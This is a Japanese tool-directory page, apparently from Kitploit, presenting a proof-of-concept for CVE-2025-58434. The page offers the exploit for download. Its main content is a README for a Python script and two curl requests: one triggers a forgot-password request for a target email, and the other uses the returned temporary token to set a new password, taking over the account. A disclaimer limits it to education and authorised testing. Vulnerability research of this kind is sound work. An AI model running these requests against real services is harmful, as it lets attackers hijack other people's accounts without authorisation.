Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-58434-PoC — CVE-2025-58434 概念実証 | Kitploit
ツール/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

CVE-2025-58434 概念実証

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-58434 の PoC

POST /api/v1/account/forgot-password をトリガーする Python の PoC スクリプトです。

⚠️ 教育目的および許可されたセキュリティ研究のみを対象としています。 自分が所有していない、または書面によるテスト許可がないシステムに対してこのツールを実行することは違法です。

クレジット

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

詳細

  • CVE-2025-58434 の PoC
  • 参照: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

ファイル

  • poc.py: マシンのURL/IP、ベアのホスト/IP使用時は任意のプロトコル、対象のメールアドレス、パスワードを入力させ、リクエストを送信して、curl -i と同様にHTTPステータス、ヘッダー、レスポンスボディを出力します。

使い方

実行:

root@kitploit:~
python3 poc.py

その後、以下を入力します:

  • マシンのURL/IP(例: 10.10.11.10、http://10.10.11.10、https://target.example)
  • ベアのホスト/IP指定時に求められた場合はプロトコル
  • メールアドレス
  • パスワード

同等の curl コマンド

1つ目のリクエスト

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

2つ目のリクエスト

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'
ツールをダウンロード